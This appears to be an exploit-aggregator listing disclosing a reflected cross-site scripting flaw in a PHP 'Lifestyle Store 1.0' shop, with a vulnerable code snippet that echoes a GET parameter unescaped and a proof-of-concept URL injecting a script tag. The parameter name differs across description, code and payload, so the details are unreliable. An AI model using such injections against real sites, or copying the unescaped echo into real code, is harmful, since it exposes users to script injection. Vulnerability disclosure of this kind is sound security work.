Exploit for Lifestyle Store 1.0 Cross Site Scripting

Name: Exploit for Lifestyle Store 1.0 Cross Site Scripting
Rating: 5 (181 reviews)

2021-10-13 | CVSS -0.4

## https://sploitus.com/exploit?id=PACKETSTORM:164490
Lifestyle Store 1.0 Cross Site Scripting  
  
# Exploit Title: Lifestyle Store (Online Shop Store) 1.0 - Reflected Cross-Site Scripting (XSS)  
# Date: 2021-10-12  
# Author: Thamer https://twitter.com/thamer9900  
# Software Link: https://download-media.code-projects.org/2021/07/Online_Shop_Store_In_PHP_With_Source_Code.zip  
# Version: 1.0.0  
# Tested on: Windows 10  
  
  
1. Description:  
The tab parameter in the signup.php is vulnerable to XSS.  
  
  
2. signup.php in line 62 code:  
  
if(isset($_GET["m2"])){  
echo $_GET['m2'];  
}  
  
3. Proof of Concept:  
/online-shop/signup.php?error=<script>print()</script>